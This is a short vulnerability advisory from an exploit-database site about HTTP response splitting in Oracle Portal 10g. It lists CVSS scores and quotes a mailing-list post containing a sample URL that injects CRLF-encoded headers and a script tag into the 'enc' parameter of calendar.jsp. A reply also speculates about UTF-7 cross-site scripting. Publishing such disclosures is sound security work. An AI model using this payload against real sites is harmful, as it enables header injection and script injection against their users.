Oracle Portal 10g HTTP Response Splitting

2006.12.24
Credit: Brian
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

On 12/20/06, putosoft softputo <hasecorp (at) hotmail (dot) com [email concealed]> wrote: > Oracle Portal/Applications HTTP Response Splitting > -------------------------------------------------- > > Sample: > > http://<target>/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-leng th=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E So they let the URL specify the content-encoding? They might be vulnerable to XSS via UTF-7 as well. Regards, Brian


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top